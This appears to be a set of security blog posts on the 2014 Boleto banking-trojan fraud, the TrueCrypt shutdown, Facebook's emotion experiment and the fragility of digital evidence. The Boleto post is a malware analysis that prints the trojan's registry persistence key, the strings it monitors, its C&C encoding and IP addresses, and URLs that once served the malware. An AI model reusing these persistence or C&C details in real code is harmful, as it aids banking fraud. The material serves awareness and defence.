Boleto fraud: You don’t need a fast car to rob a bank anymore

Introduction

Cartoon hacker with laptopThe number of actual physical robberies on banks has slipped to almost zero, but the amount of money that they are losing through electronic methods has rocketed. With physical security it’s so easy to put up CCTV cameras, bullet proof glass, and have alarm bells, but in an electronic world there are an infinite ways to commit fraud. In fact there are so many targets in a electronic world, and criminals can focus their efforts on the customer, the bank, or the merchant. With virtually no effect at all criminal gangs can install malware within any part of the e-Commerce infrastructure, and either steal user credentials or modified transactions. While we may say that it is a victimless crime, we would be wrong, as large-scale fraud can have serious implications on the global financial market, and also on user trust.

In fact from the early days on the Internet, individuals have been find ways round the processes in the place (Figure 1). This includes John Draper (or Captain Crunch) who used a whistle tuned to 2.6kHz to place long distance calls that was given free in the cereal pack, to Vladmin Leven, from Russian, who siphoned off millions from Citibank. As we will find, these days, any script kiddie can create their own targeted attack on users, and it does not need extensive programming skills, or even a deep knowledge of how the e-Commerce infrastructure works. A key target, though, is the end user, as they tend to be the weakest link in the chain.

The latest targeted malware, most probably setup by Brazilian organized crime gangs has hijacked boleto transactions in Brazil for a vast amount of low-dollar transactions. It works by tricking users to install a piece of malware on their system which waits until the user visits their bank’s Web site. On detecting this, the malware fills-out all the required information for account require for the recipient of a boleto transaction. The malware then submits the transfer for payment, and modifies it by substituting a recipient account for the attackers one.

hackFigure 1: Well-known hackers

What happened with Boleto?

In July 2014, RSA announced a large-scale fraud of Boleto Bancário (or Boleto as it is simply known), and which should serve as a wake-up call for the finance industry, and governments around the World. In fact, it could be the largest electronic theft in history ($3.75bn). Overall with the fraud there were nearly 200,000 infected IP addresses that had the infection on their machine. A boleto is similar to an invoice issued by a bank so that a customer (“sacado”) can pay an exact amount of a merchant (“cedente”). These can be generated in an off-line manner (with a printed copy) or on-line (such as in on-line transactions).

Boleto is one of Brazil’s most popular payment methods, and just last week it was discovered to have been infected, for over two years, by malware. There are no firm figures on the extent of the compromise, but up to 495,753 Boleto transactions were affect, with a possible hit of $3.75bn (£2.18bn).

Boleto is the second most popular payment method in Brazil, after credit cards, and has around 18% of all purchases. It can be used to pay a merchant an exact amount, or, typically to pay for phone and shopping bills. There are many reasons that Boleto is popular in Brazil, including the fact that many Brazilian citizens do not have a credit card, and even when they do have one, they are often not trusted. Along with this the transaction typically has a fixed cost of 2 or 4 US dollars, as apposed to credit rates which is a percentage of the transaction (in Brazil, it can typically be between 4 and 7.5%).

The operation infected PCs using standard spear phishing methods, and managed to infect near 200,000 PCs, and stole over 83,000 user email credentials. It used a man-in-the-browser attack, where the malware sits in the browser, which included Google’s Chrome, Mozilla’s Firefox and Microsoft’s Internet Explorer, and intercepts Boleto transactions. The reason that the impact was so great, is that Boleto is only used in Brazil, thus malware detection software has not targeted Boleto, as it is a limited market.

The Web-based control panel [2] for the operation shows that fraudsters had stolen $250,000 from hijacked 383 boleto transactions from February 2014 until the end of June 2014 (Figure 2). Of the statistics received, all the infected machines where running Microsoft Windows, with the majority running Microsoft Windows 7 (78.3%), with Microsoft Windows XP being the second most popular (17.2%). Of the browsers detected the most popular was Internet Explorer (48.7%), followed by Chrome (34%) and Firefox (17.3%), and the most popular email domain used to steal user credentials was hotmail.com (94%).

Figure 2: Control panel showing fraud

Was Boleto secure?

While it was seen to be generally secure, it has been identified as being open to a ‘check-bounce’ scenario, where a payment looks as it has went through, and the goods are received, but the transaction eventually bounces (which is similar to a check bouncing). A typical transaction involves the bank notifying the CyberSource Latin American Processing that a boleto has been paid, but can either indicate that the payment status is either paid or not. In the case of a check, the status will be set to non-payment. There can thus be fraud when the goods are received before the payment is cleared. When the payment status is set of ‘paid’ the transaction is reported to the Payment Events Report. Unfortunately there are no charge-backs on Boleto transactions, and the transaction is paid by cash, check, or through an online bank transfer. There is some protection, though, in using Boleto, as consumers are allowed to seven days to ‘regret’ the payment, and ask for a refund. With Visa, there is payment protection for the consumer, which does not happen with Boleto.

So who was the man-in-the-browser?

Figure 3 shows an outline of the taxonomy of malware. It shows that it has a:

  • Distribution method. In the case of the Boleto fraud this was through spear phishing emails.
  • System compromise. After distribution, the malware then compromises the system and places itself in a persistent way. In this case it placed a program on the disk, and then added an entry into the Windows registry so that the program loaded ever time the computer was booted.
  • Trigger event. After the compromise, the malware is then triggered by an event. In this case by the user accessing their Live/Hotmail email account or by when the made a transaction using Boleto.

In the case of the Boleto fraud the man-in-the-browser was Eupuds (which is classified as an Information Stealing Trojan (MITB)) and which infects web browsers on Windows-based PCs, including Internet Explorer, Firefox and Chrome, and also steals account information for live.com, hotmail.com and facebook.com.

Eupuds manages to stay alive by created a program on the disk at (where c:\users\fred is the home directory):

c:\users\fred\Application Data\[RANDOM CHARACTERS].exe

and then makes sure that it is always started when the computer is booted by modifying the Windows registry key of:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM CHARACTERS].exe" =
 "c:\users\fred\Application Data\[RANDOM CHARACTERS].exe"

In this way the Trojan program is always started when the computer is booted. In many cases the malware will hide itself so that it can get round a virus scan. In this case, the malware creates random characters to the name of the file, and then creates a different name for the process. Along with this the malware is compiled AutoIt script, and uses UPX packing, which makes it difficult to analyse/reverse engineer.

The malware works by detecting traffic between the browser and the server, and searches for specific strings:

  • Boleto.
  • pagador.com.br – this is the Brazilian online payment service.
  • segundavia – this is used when requesting a Boleto reissue.
  • 2via – this is used when requesting a Boleto reissue.
  • ?4798 – this is part of a Brazilian bank URL.
  • carrinho -this is a shopping cart of an online store
  • live.com – this detects a login for the Microsoft Live email package.

This is a modification of the standard Eupuds malware, which also detected strings containing .gif, .png, .flv, and facebook.com. Once it is installed it then looks for client-side security plug-ins used by banks. The shared executables that the plug-ins use are then neutralised by downloading patched-versions, so that the user has no protection for the man-in-the-middle.

malwareFigure 3: Taxonomy of malware

There have been many threat message which highlight the distribution of the spam emails, such as from Cisco Systems on 2012:

Cisco Security Intelligence Operations has detected significant activity related to spam e-mail 
messages that claim to contain an import assistant program for the recipient. The e-mail message 
attempts to convince the recipient to open a .zip attachment to preview the data to be imported. 
However, the .zip attachment contains a malicious .cmd file that, when executed, attempts to 
infect the system with malicious code.
 
E-mail messages that are related to this threat (RuleID4218, RuleID4218KVR, and RuleID4349KVR) 
may contain an of the following files:
Fatura_Cartao.txt.zip
 Fatura cartao.cmd 
 Fatura-Boleto.zip
 Fatura-Cartao.cmd
 Fatura.zip
 Fatura.cmd
 Fatura.exe
 Boleto.zip
Boleto.cmd
The Boleto.cmd file in the Boleto.zip attachment has a file size of 368,640 bytes. The MD5 checksum is the following string: 0x21E9F84477A48C63115FE0E9A22E4DA8. The following text is a sample of the e-mail message that is associated with this threat outbreak: Subject: Boleto@jcessoria.com.br Message Body: Zip archive attachment (Fatura_Cartao.txt.zip) or Subject: Boleto de cobranca Message Body: Demostrativo em anexo. or Subject: cobranca@checkok.com.br
Message Body:
Demostrativo em anexo.

As this threat warning is nearly two years old, why did it take so long to actually discover the objectives of the malware? Other warnings, such as in 2013 also highlighted the threat. Along with this the first signs of the ZIP file containing the malware appeared in 2010:

2010/10/8_12:43 fileden.com/files/2010/9/27/2980248/Boleto.zip
2010/11/3_00:52 novemstn.webcindario.com/boleto.zip
2010/11/3_05:09 ormsoigso.webcindario.com/boleto.zip

The last two are Spanish hosting companies.

Detecting the Malware

Once the malware is installed on the machine, it communicates with the command and control (C&C) server using a basic encryption method, which encodes the messages with an exclusive-OR (XOR) operation using a key of
0xA4BBCCD4, followed by a modified Base64 encoding, with characters such as ‘+’ and ‘/’ replaced
by ‘-’ and ‘_’, respectively (Figure 4). The IP addresses detected for the C&C include 216.246.98.4, 216.246.91.220 and 216.246.91.221, which point to the hostforweb.com domain, and which is a general Web hosting infrastructure.

mal01Figure 4: Network request (RSA Labs [1])

Conclusions

Spear phishing is the most common method of getting malware these days, where users are sent emails with links on them, and when the user clicks on them, they will run a program on their computer, and install the malware. In this case it was a Trojan which intercepted the communications between the browser and the Web site, and was setup to detect Boleto payments. The malware also was able to intercept email login details. So what’s the solution? Users need to watch what the click, and also patch their systems.

What is most worrying about this type of fraud, is that it could compromise the whole of the finance industry, and could even bring down major finance companies, and even nation states, with a single large-scale event. The target is slowly moving to end-users, as, as long as there’s one person will to click on a link in an email, there will be the potential for fraud.

if you are interested, this presentation shows a real-life Trojan infection, and which uses the same methods used in this fraud. For details of exploit kits (go to 57m6s), and on a real-life Trojan is at (13m30s):

References

[1] RSA DISCOVERS MASSIVE BOLETO FRAUD RING IN BRAZIL, https://blogs.rsa.com/wp-content/uploads/2015/07/Bolware-Fraud-Ring-RSA-Research-July-2-FINALr2.pdf, July 2014.

[2] Brazilian ‘Boleto’ Bandits Bilk Billions, http://krebsonsecurity.com/2014/07/brazilian-boleto-bandits-bilk-billions/

TrueCrypt: A Strange Mystery in a World of Secrets

Introduction

Imagine the headlines, if, after a full review of the safety of their cars, that BMW announced that they were releasing a new car that had safety warning messages all over it, and that it was the last car they would ever be building. To add to this they had limited the performance of it so that it was almost unusable, and that car users should go and purchase a Mercedes Benz instead. And, finally, that they were shutting down all their plants and burning of all their designs, so that no-one could use them. Well, in the world of cryptography, this is roughly what happened with TrueCrypt.

Keeping a secret

The ability for defence agencies to read secret communications and messages gives them a massive advantage over their adversaries, and is the core of many defence strategies. Most of the protocols used on the Internet are clear-text ones, such as HTTP, Telnet, FTP, and so on, but increasing we are encrypting our communications (such as with HTTPS, SSH and FTPS), where an extra layer of security (SSL) is added to make it difficult for intruders to read and change our communications. When not perfect, and open to a man-in-the-middle attack, it is a vast improvement to communicating where anyway how can sniff the network packets can read (and change) the communications. The natural step forward, though, is to encrypt the actual data before it is transmitted, and when it is stored. In this way not even a man-in-the-middle can read the communications, and the encryption key only resides with those who have rights to access it.

While many defence mechanisms in security have been fairly easy to overcome, cryptography – the process of encrypting and decrypting using electronic keys – has been seen as one of the most difficult defence mechanisms to overcome. It has thus been a key target for many defence organisations with a whole range of conspiracy theories around the presence of backdoors in the cryptography software, and where defence agencies have spied on their adversaries. Along with the worry of backdoors within the software, there has been several recent cases of severe bugs in the secure software, and which can comprise anything that has been previous kept secure. This is highlighted within OpenSSL for Heartbleed, and with the heart symbol bug in TweetDeck.

So, after the major impact of the bug found in OpenSSL which led to Heartbleed, on 28 May 2014 2014 visitors to the TrueCrypt site found a message of:

The development of TrueCrypt was ended in 5/2014 after Microsoft 
terminated support of Windows XP. Windows 8/7/Vista and later offer 
integrated support for encrypted disks and virtual disk images. 
Such integrated support is also available on other platforms 
(click here for more information). You should migrate any data 
encrypted by TrueCrypt to encrypted disks or virtual disk images 
supported on your platform.

For an open source project which supported a wide range of computer types and languages, it was a strange message to say that users should move to a closed-source and commercial solution. From a software solution that supports most types of modern computers, and is free to use, Bitlocker is part of Microsoft Windows, and which requires a licence for a version of Microsoft Windows that supports disk encryption.

Some basics of encryption

Most encryption uses a secret encryption key, which is used to encrypt and also to decrypt. This is known as private-key encryption, and the most robust of these is AES (Advanced Encryption Standard). The key must be stored someone, and is typically placed in a digital certificate which is stored on the computer, and can be backed-up onto a USB device. The encryption key is normally generated by the user generating a password, which then generates the encryption key.

Along with this we need to provide the identity of user, and also that the data has not been changed. For this we use a hash signature, which allows for an almost unique code to be created for blocks of data. The most popular for this is MD5 and SHA. More details here. The hashing method used in TrueCrypt is SHA-512.

The Trouble Caused by Cryptography

Encryption is the ultimate nightmare for defence agencies, as it makes it almost impossible to read messages from enemies. The possibilities is to either find a weakness in the methods used (such as in OpenSSL) or with the encryption keys (such as with weak passwords) or, probably the easiest is to insert a backdoor in the software that allows defence agencies a method to read the encrypted files.

There has been a long history of defence agencies blocking the development of high-grade cryptography. In the days before powerful computer hardware, the Clipper chip was used, where a company would register to use it, and given a chip to use, and where government agencies kept a copy of it.

in 1977, Ron Rivest, Adi Shamir, and Leonard Adleman at MIT developed the RSA public key method, where one key could be used to encrypt (the public key) and only a special key (the private key) could decrypt the cipher text. Martin220px-PRZ_closeup_cropped Gardner in his Mathematical Games column in Scientific American was so impressed with the method that he published an RSA challenge for which readers could send a stamped address envelope for the full details of the method. The open distribution of the methods which could be used outside the US worried defence agencies, and representations were made to stop the paper going outside the US, but, unfortunately for them, many papers had gone out before anything could be done about it.

Phil Zimmerman was one of the first to face up to defence agencies with his PGP software, which, when published in 1991, allowed users to send encrypted and authenticated emails. For this the United States Customs Service filed a criminal investigation for a violation in the Arms Export Control Act, and where cryptographic software was seen as a munition. Eventually the charges were dropped.

A Brief History of TrueCrypt

TrueCrypt is an open source disk cryptography package, which has been around since February 2004 and maintained by the TrueCrypt Foundation. It has versions for Microsoft Windows, OS X, Linux, and Android, and supports 30 languages. David Tesařík registered the TrueCrypt trademarking the US and Czech Republic, and Ondrej Tesarik registered the not-for-profit TrueCrypt company in the US. It works by created a virtual drive on a computer, and then anything which is written to the disk is encrypted, and then decrypted when the files are read back. For encryption it uses private key encryption with AES, Serpent, or Twofish (or combinations of these), and uses hash functions of RIPEMD-160, SHA-512, and Whirlpool. In modern systems, AES is seen to be the most secure, and SHA-512 provides state-of-the-art signatures. The encrypted drive does not have a magic number which identifies the presence of TrueCrypt, but forensic analysis can reveal a TrueCrypt boot loader, after which a hacker might try different passwords to unlock the drive.

So what happened?

Internally, with Version 7.1a, there had been an audit on the code, with an announcement on 28 May 2014 that there was a discontinuation of TrueCrypt, along with the release of version of 7.2 (which was intentionally crippled and contained lots of warnings in the code). The updated licence (TrueCrypt License v 3.1) contained the removal of a specific language that required attribution of TrueCrypt. Never in the history of software had there been such an abrupt end, and where the developers did not even want a fork of their code. A recent email from a TrueCrypt developer (on 16 June 2014) outlined that they did not want to change the license to an open source one, and that the code should not be forked.

Backdoor?

Some reckon that there was an on-going code audit, and that an NSA-created backdoor was due to be found. Again, something that the smoke-screen was then put-up to move towards a closed-source alternative, which some reckon, also has an NSA-enabled backdoor. Few security professionals, especially those involved in the creation of encryption software, would have recommended the Microsoft technology.

The mystery remains about the code, but there are some strange pointers that give some clues. A strange one is that, with the code, “U.S.” has been changed to “United States”, which could point to an automated search and replace method of changing the code to reflect a possible change of ownership of the code.

The other strange thing about the post is that the page created for the re-directed looks as if it has been created by a complete amateur:

Screen Shot 2014-07-03 at 21.06.18and even the Wayback engine was having trouble finding the pages from the past:

Screen Shot 2014-07-03 at 21.12.30So was it a back door or could it have been a bug, in the same way that OpenSSL was exposed?

Code bug?

If there is a code bug, the light is likely to shine on one of the weak points in cryptography, which is the generation of a pseudo random number, which is almost impossible on a computer. One way of doing this is to randomly use the time between key strokes for users, but if an intruder can guess these, they can significantly reduce the range of numbers used for the cryptography process. This could have been the Achilles heel of the code, and that the audit process could have uncovered a flaw, which others could exploit. In the case of TrueCrypt the random number was generated by the user moving a cursor across the screen, and it could be this method which caused the problem.

Another possible problem focuses on the actual binary code produced. Even if the source code does not contain any bugs, it will be converted into machine code, which could expose problems which could be exploited. Overall, most users will generally download the binary distribution, as it is often too difficult to build the code from scratch. Thus there could have been an exploit within the binary distributions which could be compromised. Often developers forget that their code can be run within a debugger to view, and even edit, the code. With the code built for so many systems, it would have been almost impossible to make sure that the compiled code would be secure from being tampered with.

Will it die?

While the licence possibly prohibits a fork of the code, new groups, working outside the US, are Screen Shot 2014-07-03 at 21.55.29looking a setting up the code to overcome the licencing issues. The Web site on the right-hand side shows a group based in Switzerland (TrueCrypt.ch), and who aim to fully investigate the code, and build on previous versions of the code. The message on the site is:

TrueCrypt
must not die

TrueCrypt.ch is the gathering place for all up-to-date 
information.  If TrueCrypt.org really is dead, we 
will try to organize a future.

The Problems with Disk Encryption

Many see the encrypting of disks as the ultimate method of security, but, unfortunately, it suffers from many problems. These include:

  • When the user uses a weak password can make it fairly easy for an intruder to crack, as they continually try common passwords.
  • The encryption key is stored in running memory which is protected when TrueCrypt is running, but researchers have shown that a warm boot (that is, one which starts from a Ctrl-Al-Del, rather than from a power up) can release the lock on the memory and reveal the encryption key.
  • The domain administrator has a copy of the encryption keys. Most users in companies connect to a domain, and the domain administrator normally has a copy of the encryption keys for the encrypted drive (and which normally can be used to decrypt the disk if they user forgets their password). If they domain is breached the encryption key can be stolen and used to decrypt the drive.
  • The electronic key must be stored somewhere, and this is normally on a digital certificate. This is stored on the system, and can be cracked by brute-forcing the password on the digital certificate.

Conclusions

This article has more questions than answers, as this is currently where we are in understanding what happened here. There are still many theories around, but what could have happened, and virtually every software developer will relate to this, is that the developers found an architectural flaw, which could not be fixed with a simple update, and they decided to pull-the-plug. Otherwise, there approach seems strange, and doesn’t fit into the normal practice of open source developers. It must be noted that when OpenSSL was analysed it contained a whole of serious problems, and perhaps the developers within TrueCrypt realised that their code, written in C++ and Assembly Language, might have some serious problems which could be exploited by others, or that it had already been.

Many wonder why the audit started by the TrueCrypt team should continue, but humans are inquisitive, and love the challenge of looking for flaws, so we need to keep examining our code, and weed out bad practice, as so many problems have been caused with poorly written software, just as OpenSSL has shown.

What is strange is that all the previous versions have been taken-off the TrueCrypt site, which seems to point to a problem with these versions, and where they are pushing users to use the most up-to-date version (which contains lots of warnings and with code that makes it difficult to use).

In an era, where the natural next step for security is for us to store encrypted data within public cloud infrastructures, a weaknesses of this could end up compromising the whole of the Internet. So rather than the shock story around BMW giving up building cars, the shock story could be that all our secret files and communications were now viewable by everyone on the Internet … honestly … it could happen!

In the Information Age, we are all part of a great big experiment

Introduction

Connected People in NetworkWe are entering into an era where data is King, and where our every move, our every emotion and our every contact can be tracked. With the increasing analysis of social media, there is often very little that can be done about our lives that can be hidden from organisations wishing to push customized content to us, to try and understand how we live our lives. If an on-line company can drop a cookie onto our machine, they can sustain a long-term tracking of our activities, and this now includes understanding how we react to advertising material, especially on what material has made us click on the content, and increasingly they are learning our behavior.

The need to gain ethical permission, in the same way that research teams require when they involve human participants, is slowly eroding, and perhaps, in some cases, a natural extension of existing practices, where advertising content is focused on target groups.

One of the major changes within this Big Data era, is that users often freely offer their data to the Internet, and where it can be used in ways that are often unexpected to the user. For example, a tweet on a local event will time stamp where a person was at a given time, and even reveal information around their movements, and perhaps who they had contact with.

Mining for sense and emotion

With so much on-line data, it is key for advertising agencies to understand the emotions of messages posted on-line, and where studies that would take months or even years, can now be done within minutes. Like it or not, we are all part of an on-going experiment which is mining our data on a continual basis, and then pushing content our way, and monitoring even how we use the customized content.

SInce advertising began as an industry, researchers have thus been trying to mine large populations for the emotions, and the challenge within social media is to make sense of large amount of comments and to mine for the sentiments shown with them. This is fairly easy with a tweet of:

I am so happy that the sun is shining today :-)

but by placing a different emoticon on it, changes the sense:

I am so happy that the sun is shining today ;-)

and then is changed completely with the dreaded exclamation mark:

I am so happy that the sun is shining today!

which gives the impression that someone is very unhappy about the weather.

Part of a great experiment

Facebook took the emotion research one step forward in January 2012,  when their data scientist Adam Kramer conducted a two week experiment on 689,003 Facebook users, in order to find out if emotions where contagious within social networks. It basically came of the almost obvious conclusion that users feel generally happy when they are fed good news – the economy is looking good and the weather is nice – and depressed when they get bad news – a bomb has gone off injuring many people and it looks like snow is on the way.

For users the mining of the data is generally fine, and Facebook, and many other Internet-focused companies, especially Google and Amazon,  extensively mine our data and try to make sense of it. For this symbiotic relationship, the Internet companies give us something that we want, such as free email, or the opportunity to distribute our messages. What was strange about this one is that the Facebook users were been treated in the same way as rats in a laboratory, and had no idea that they were involved in the experiment. On the other hand it is not that much different from the way that affiliate networks have been created, and which analyse the user, and try to push content from an affiliate of the network, and then monitor the response from the user (Figure 1).

We increasingly see adverting in our Web page accesses, where the user is matched to their profile though a cookie, and where digital marketing agencies and affiliate marketing companies  try and match an advertising to our profile. They then monitor the success of the advertising using analytics such as:

  • Dwell time. This type of metric is used to find out how keen the user has been before clicking the content.
  • Click-through. This records the click-though rate on content. An affiliate publisher will often be paid for click-throughs on advertising material. This can lead to click-through scams, where users a paid to click on advertising content on a page.
  • Purchases. This records the complete process of clicking-though, and the user actually purchasing something. This is the best level of success, and can lead to higher levels of income, and in some cases to share a percentage of the purchase price. Again this type of metric can lead to fraud activity, where a fraudster will use stolen credit card details to purchase a high price item through a fraudulent Web site, and use this to gain commission from an on-line purchase (which is then traced to be fraudulent at a future time).

affFigure 1: Affiliate marketing

The key areas which are relevant to monitoring of user activities are:

  • Transaction verification. This involves protecting users by understanding their activities, especially around the types of purchases they make.
  • Brand monitoring. This involves understanding how brands are used within web pages, and how they are integrated and if key messages are picked-up.
  • Web-traffic analytics. This involves understanding how users search of pages and navigate around web sites.
  • Affiliate platforms. This tries to match users to affiliates, and integrate targeted marketing.
  • Campaign verification. This uses analytics to verify that campaigns are successful in their scope.

One of the most successful uses of targeting the user and monitoring their actions is in affiliate marketing, where  businesses reward affiliates for each ‘customer’ brought about by the affiliate’s own marketing efforts. This is a booming market:

  • Of projected global online sales of nearly $780 billion by 2014, ~ $90bn will be driven by affiliate marketing
  • $4.62bn sales driven by affiliate marketing in the UK in 2010.

Figure 2 shows an example of targeted advertising, where a previous page involved a search for a Microsoft Surface Pro, and Ad-Choice (which is maintained by Criteo) has integrated an advert for it within another page. In this way Ad-Choice has decided that this is a good advertisement for us, and if we click though, the click will be remembered, and the host site will get some form of payment for the click. If the user actually follows-through and purchases the goods, the host site could gain a part of the commision.

expertFigure 2: Ad-choice integration based on user activity

Conclusions

Thus we are being monitoring and mined all the time, and the content which is pushed to us is focused on us. Increasely the content for us is being customized with advertising messages. There is generally no need for informed consent, at the present, for this type of push advertising, as users generally feel that there an acceptable level in intervention for their Web content, but perhaps forget that there is a whole of lots matching and analyzing going on in the background.

Gaining Access to our Internet Records – Warrant or Not? Can it be trusted?

Background

Corroboration article

Corroboration article

Many countries are debating how digital information is used to detect and resolve crime. On the right-wing, there is a push to justify the accesses to ISP (Internet Service Provider) information, such as for the IP addresses of users downloading and distributing copyright material, while more liberal government see this as a Big Brother society.

In a countries such as Canada there is a move for information from ISPs to be handed over without a warrant. The Conservative government in Canada has thus pushed through Bill C-13 (Protecting Canadians from Online Crime Act) which aims to allow access to ISP records within a warrant, but the Bill has just been overruled by Canada’s top court as being unconstitutional, and seen as a snooping law. A major question must be in how creditable Internet records will actually be, as many homes are allocated a single IP address, which maps to all the users of the home network. The Bill is justified through the risks around Cyberbully and copyright breaches, but could obviously be abused, and used for a range of surveillance activities. A previous Bill (C-30) was rejected due to surveillance concerns, and many think that the recent cases of Cyberbullying in Canada are being used to justify C-13.

In Scotland, too, there has also been a great deal of discussion on ditching corroboration in cyber crime in Scotland. It looks like that this will not go ahead. One thing that should be remembered is that digital evidence is often fragile. To outline how fragile it is, the article outlines six key scenarios which show that it is often not possible to fully prove the digital information is fully creditable in criminal investigations. The six defence scenarios which can be easily quoted are:

  • It wasn’t my computer.
  • Someone accessed my machine and did it.
  • Someone stole my user account details.
  • The bot did it.
  • My computer automatically went to it.
  • I didn’t send the email.

The article does not outline the rights or wrongs of accessing without a warrant, but outlines the cases where the digital information cannot be seen as definitive sources of evidence.

Six Scenarios

Digital Information is really just a bunch of 1s and 0s. It is fragile, and often can be changed while it is stored, transmitted or even processed. Basically all the information what we see is converted from these 1s and 0s, and often provided in a way which can be easily compromised. I thus see the usage of digital evidence gathering provides investigators with new ways to quickly investigate, and also to provide corroboration to traditional evidence. I’d like to thus outline seven scenarios, which show how fragile digital information is.

Crime Scenario 1 (Defence: It wasn’t my computer). In this case Bob is at home, and his ISP has detected that he has been accessing illegal content. Bob is arrested, and says that it was someone else in his work. In this case, most home networks use NAT (Network Address Translation) which maps one or more private IP addresses (such as 192.168.0.1, 192.168.0.2, and so on) to a single public IP address. Thus all the data packets received by the ISP will have the same IP address, no matter the computer that generated the request. Thus it is not possible to lock-in on the physical address of the computer, as the physical address cannot be determined from the data packets. So just IP addresses alone cannot be taken as a single source of evidence.

In a company environment, again, the IP address alone cannot be taken as a creditable single source, as it can be spoofed. In this case, Alice waits for Bob to log-off, and then sets her computer to a static address which matches Bob’s computer, and then accesses the material, and Bob gets the blame. If we were to use the physical too as a trace, again, the physical address (normally known as the MAC address) is also easily spoofed.

Crime Scenario 2 (Defence: Someone accessed my machine and did it). In this case, Bob’s computer has illegal content on it, and he claims that he had no idea how it got there. In this case, most computers are networks, and once they join a network that can be connected to. Often guest shares or guest accounts can be used to create a connection. If not, there’s a whole lots of malware kits that Eve can use to gain remote access to the machine. In this case Eve sends a link to Bob to access a PDF document. He views it, and it actually setups up a remote access method for Eve, and she can do whatever she wants on his machine. If Bob hasn’t patched his machine, he has become vulnerable to this. So in defence he just says that he doesn’t trust Microsoft for their patches, and it was their fault. If the PDF one doesn’t work, she tries a Java exploit, if that doesn’t work, it’s a Flash compromise … and she keeps trying.

Crime Scenario 3 (Defence: Someone stole my user account details). Bob is arrested for trying to take money from someone else’s account and put it into an off-shore account. The bank says that he logged in, and transferred the money. With this, Eve has send Bob a trick email which asks him to login and check some details. He logs in, but it doesn’t work, but the next time it is fine. After this Eve has his login details, and can go ahead and login on his behalf. Bob has no idea that anything has went wrong, but the first site was a spoof-site, and captured his login details for his bank, and then redirected to the main site, for which the login worked. To make the spoof site look real, Eve has scrapped the images, text and style sheets from the bank site, so it all look real.

trojCrime Scenario 4 (Defence: The bot did it). In this case, Bob has been attacking a remote site, and is arrested. His defence is that it wasn’t him, but it was a bot on his machine. In most cases, this defence is not strong, but there is always a chance that a bot on the computer did generate the malicious activity. Just because no malware is found on a machine at the point of investigation, doesn’t mean that it wasn’t there at some time in the past.

Crime Scenario 5 (Defence: My computer automatically went to it). In this case, Bob has been detected by his ISP in accessing some criminal material. He is arrested, and says that he knew very little about it, and has basically accessed his bank but ended up viewing the criminal material. For this one, we have to look at details at domain name servers (DNSs), and to Internet gateways. Unfortunately, the Internet has been created with very little creditability in the information that is passed. So when Bob starts his computer, Eve has broadcasts the MAC address of her computer, and pretends to be his Internet gateway and also his DNS server. All Bob knows is that when he accesses his bank, he sees the wrong site. In fact, Eve has poisoned his domain name look-ups, and she resolves his domain requests to the wrong IP address, which is logged on the ISP.

Crime Scenario 6 (Defence: I didn’t send the email). In this case we have Bob who is send abusive emails to Alice, and she forwards them onto the Police saying that he is abusing her. Bob is then arrested saying that he knew nothing about it. In this case, the email system we have setup has no credibility, and anyone can send an email saying that they are anyone they want to be. Thus Eve uses her own SMTP server, within a private network, and send the email. In fact the email contents just contain headers of:

To: Alice@test.com
From: Bob@test.com

and there is no way of actually telling it was from Bob. So? Email really can’t be used as a fully creditable source of evidence. If can be used to timeline, but you cannot ever confirm that the send is actually who it says in the “From:” field.

Conclusions

There’s very little of what is generated on a computer or network is actually 100% creditable. Basically if someone wants to change things on the Internet, or on computers, they can do so. I appreciate that many of the crimes which are investigated related to cybercrime have threat levels, but that does not justify reducing the threshold for the evidence level. To pin-point someone from an IP address (or even a MAC address), when they are using a shared home network, it not really any form of creditable evidence, and can only be used to provide one piece of the picture around a crime.

Text from the article

POLICE have called for the abolition of a key plank of Scots law in order to help secure convictions for online crimes such as child pornography and grooming.

Officers say the need to corroborate key facts to bring a case to court is limiting their ability to tackle cyber crimes, which include paedophilia, harassment and online fraud.

But online experts have warned that digital trails of evidence can be unreliable on their own and need to be corroborated by others forms of evidence to prevent miscarriages of justice.

Police Scotland officers struggle to find corroborating evidence when acting on allegations of online crime brought by members of the public.

Assistant Chief Constable Malcolm Graham said: “It’s an emerging crime type where the likelihood of getting corroboration for essential facts diminishes.

“A lot of cases that come through the courts are where police have proactively monitored people, where we think there’s a risk that children might be abused.

“But in cases where people come and report to us that they have been the victim of cyber crime, there can be issues in terms of attributed communications hardware.

“We believe the law should develop to keep in touch with technology. This would be an example where current legislation has not developed and evolved in recognition of the range of criminal operations.”

Police Scotland supports the Scottish Government’s plans to abolish the requirement to have corroboration in order to bring a case to court.

The legislation, which is being debated in the Scottish Parliament, is based on recommendations by Lord Carloway, the Lord Justice Clerk, which are opposed by other Scottish judges and leading lawyers.

Professor Bill Buchanan, director of Edinburgh Napier University’s centre for distributed computing, networks, and security, which trains police in tackling cyber crime, also warned against abolishing the need for corroboration.

“On the internet it’s very difficult to take one source of evidence as a definitive source as things can be changed and people can have different identities,” he said.

“We should always get some physical and some traditional corroboration, along with the digital footprint.

“Logs can be tampered with, you have an IP address, but people can spoof them.”

A UK expert on online crime said that more funding, rather than a change in the law, was needed.

David Cook, a cyber crime and data security solicitor, said: “Our prosecutors find it notoriously difficult to adequately evidence crimes that occur online and the vast majority go not only without prosecution but even without a proper investigation.

“However an effective investigation can and should still take place. That those who police us choose to not provide adequate resources to such matters, instead suggesting the erosion of a civil liberty that is centuries old, is a lamentable position.

“I fear that such a change would inevitably cause an increase in the number of miscarriages of justice,” he added.

Police Scotland estimates that 3,000 more victims will be granted access to justice by abolishing the need for corroboration,” he added.

In a separate study, the Crown Office looked at 458 rape allegations which did not reach court because of insufficient evidence. They were re-examined as if corroboration was not required and prosecutors estimated 82 per cent could have proceeded to trial, and 60 per cent had a reasonable prospect of conviction.

Police Scotland has not yet produced similar research on what impact removing the requirement would have on cyber crime.

Alison McInnes MSP, Scottish Liberal Democrat justice spokeswoman, said: “This is a new argument which has certainly not been reflected in the wide range of evidence given to the justice committee. If Police Scotland believe that corroboration has impeded cases such as these then I am surprised that they have not reflected that in their oral evidence to the committee.

Abolition call: Cadder ruling

The proposed abolition of corroboration – the requirement to have two independent pieces of evidence to bring a case to court – stems from a Supreme Court judgment in 2010.

The UK’s highest criminal court found in favour of Peter Cadder by ruling that it was a human rights breach for police to interview suspects without giving them access to a solicitor. This has led to more suspects refusing to speak in interviews.

This is particularly problematic for police in cases of alleged rape. Previously an accused may have admitted having sex but claimed it was consensual, which would have allowed police to corroborate a key element of the charge.

In light of the Cadder ruling, the Scottish Government asked Lord Carloway, now Scotland’s most senior judge, to review Scots law. Carloway made a raft of recommendations, including abolishing the need for corroboration. The proposal is in a criminal justice bill now in front of the Scottish Parliament.

